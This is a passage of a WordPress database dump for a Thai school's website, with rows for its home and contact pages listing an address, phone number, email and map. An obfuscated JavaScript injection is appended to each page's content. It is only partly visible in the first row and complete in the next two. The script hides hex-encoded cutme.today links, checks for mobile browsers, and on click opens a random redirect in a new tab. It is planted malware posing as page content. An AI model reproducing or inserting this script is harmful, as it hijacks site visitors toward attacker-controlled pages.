_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 13:33:32','2024-08-01 06:33:32','',14,'http://pakhaeng.ssk.in.th/?p=361',0,'revision','',0),
(362,1,'2024-08-01 14:47:26','2024-08-01 07:47:26','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"vivid-cyan-blue\",\"width\":100,\"className\":\"is-style-outline\",\"style\":{\"border\":{\"radius\":\"19px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100 is-style-outline\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background wp-element-button\" style=\"border-radius:19px\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-cyan-blue\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-cyan-blue-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>แผนที่ตั้ง</strong></a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>ติดต่อเราได้ที่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":686,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3c91321e\",\"isDynamic\":true,\"blockVersion\":4} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b8%ab%e0%b8%99%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%87%e0%b8%b2','','','2024-08-30 12:20:11','2024-08-30 05:20:11','',0,'http://pakhaeng.ssk.in.th/?page_id=362',0,'page','',0),
(363,1,'2024-08-01 14:47:26','2024-08-01 07:47:26','<!-- wp:heading {\"level\":1,\"style\":{\"elements\":{\"link\":{\"color\":{\"text\":\"var:preset|color|white\"}}}},\"backgroundColor\":\"luminous-vivid-orange\",\"textColor\":\"white\",\"fontSize\":\"small\"} -->\n<h1 class=\"wp-block-heading has-white-color has-luminous-vivid-orange-background-color has-text-color has-background has-link-color has-small-font-size\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\">แผนที่ตั้ง</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:kadence/googlemaps {\"uniqueID\":\"362_231c47-17\",\"zoom\":17,\"location\":\"โรงเรียนบ้านหนองปลาเข็ง กอไหล่\",\"kbVersion\":2} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-01 14:47:26','2024-08-01 07:47:26','',362,'http://pakhaeng.ssk.in.th/?p=363',0,'revision','',0),
